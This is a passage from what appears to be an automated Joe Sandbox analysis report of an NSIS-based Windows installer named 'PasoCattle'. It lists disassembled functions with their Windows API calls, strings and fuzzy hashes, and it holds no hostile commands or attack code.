                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                        • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902
                                                                                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                      • String ID: F$A
                                                                                                                                                                      • API String ID: 3347642858-1281894373
                                                                                                                                                                      • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                      • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                      • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                      • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                      • API String ID: 1916479912-1189179171
                                                                                                                                                                      • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                      • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                      • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                      • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                      • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406A73
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                      • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                      • API String ID: 3581403547-1792361021
                                                                                                                                                                      • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                      • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                      • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                      Strings
                                                                                                                                                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                      • API String ID: 542301482-1377821865
                                                                                                                                                                      • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                      • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                      • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                      • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                      • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                      • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                      • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                      • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                        • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                      • API String ID: 20674999-2124804629
                                                                                                                                                                      • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                      • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                      • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                      • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                      APIs
                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                        • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                      • String ID: F$N$open
                                                                                                                                                                      • API String ID: 3928313111-1104729357
                                                                                                                                                                      • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                      • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                      • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                      • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                      • API String ID: 565278875-3368763019
                                                                                                                                                                      • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                      • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                      • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                      APIs
                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
